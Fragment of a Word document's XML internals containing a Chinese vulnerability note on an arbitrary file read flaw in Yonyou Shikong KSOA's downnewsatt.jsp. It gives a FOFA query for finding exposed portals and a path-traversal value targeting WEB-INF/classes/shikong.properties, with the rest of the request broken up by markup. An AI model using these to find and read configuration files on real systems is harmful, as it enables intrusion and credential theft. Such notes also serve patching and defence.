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54948">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用友时空KSOA downnewsatt.jsp 任意文件读取漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A736F44">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B4D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FOFA：body="onmouseout=\"this.classname='btn btnOff'\"" || body="productKSOA.jpg" || body="check.jsp?pid=" &amp;&amp; title="企业信息系统门户"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2760D105">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110CAA45"/>
    <w:p w14:paraId="47A6F9F3"/>
    <w:p w14:paraId="15E1C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A1CF841">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3129085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/newspublish/downnewsatt.jsp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6D4145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5AC9608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6E092B7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770A121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4570B5C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3C8DCD0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5DD6238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exclusivenm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../../WEB-INF/classes/shikong.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAD9033">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525AC328">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BDAF873">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="012495A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B6092"/>
    <w:rsid w:val="7FB3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456</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>483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2025-11-21T01:25:00Z</dcterms:created>
  <dc:creator>m1813</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:20:05Z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58ACCAA8A0694CC385B741B44E56A50F_12</vt:lpwstr>
  </property>
</Properties>
</file>